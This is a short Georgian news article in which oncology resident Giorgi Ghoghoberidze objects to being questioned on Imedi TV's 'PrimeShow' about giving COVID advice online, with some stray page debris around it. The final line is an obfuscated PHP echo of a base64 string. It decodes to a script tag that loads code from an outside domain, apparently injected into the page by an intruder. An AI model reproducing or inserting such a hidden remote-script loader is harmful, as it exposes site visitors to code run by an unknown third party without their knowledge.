celsiusi
ავერსი შნაიდერი
ექიმი, ონკოლოგიის რეზიდენტი, გიორგი ღოღობერიძე ტელეკომპანია "იმედის" ეთერში, გადაცემა „პრაიმშოუში“  , მისი სტუმრობისას შექმნილი სიტუაციით  განაწყენებულია, აღნიშნულზე სციალურ ქსელში წერს და გადაცემიდან ვიდეოს აქვეყნებს.
 
გადაცემის ერთ-ერთმა წამყვანმა ნინო ნადირაძემ აღნიშნა, რომ გიორგი ღოღობერიძე რეზიდენტია და დასვა კითხვა: ჰქონდა თუ არა მას უფლება, რომ რჩევები გაეცა სოციალური ქსელით კორონავირუსთან დაკავშირებით. 
 
სწორედ ამან და სხვა სტუმრების კომენტარებმა ამ თემაზე გამოიწვია გიორგი ღოღობერიძის განაწყენება. 
 
„მართლა არ ვიცი, რატომ მიმიწვიეს ამ გადაცემაში, მაგრამ ძალიან საწყენი გახდა, როდესაც მიზეზი გადაცემის მსვლელობისას გავიგე.
 
„პრაიმშოუს“ გვერდზე იდო ეს ვიდეო, მაგრამ წაშალეს…
 
ჩემ გარდა, კოვიდპანდემიის დროს, ყველა იძლეოდა რჩევებს, აბსოლუტურად ყველა, განურჩევლად პროფესიისა, მაგრამ ამის მიუხედავად, ჩემი გაშავება არჩიეს…
 
არადა, არც პოლიტიკური ინტერესი მქონია და არც- ფინანსური, მხოლოდ ხალხის დახმარება მინდოდა და მინდა.
 
რეზიდენტი მალე აღარ ვიქნები, მაგრამ მაინც ძალიან მეამაყება, რომ „რეზიდენტის“ სტატუსით გამოვდიოდი!
 
მეწყინა ამგვარი დამოკიდებულება“ - წერს გიორგი ღოღობერიძე. 
 
 
10708
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");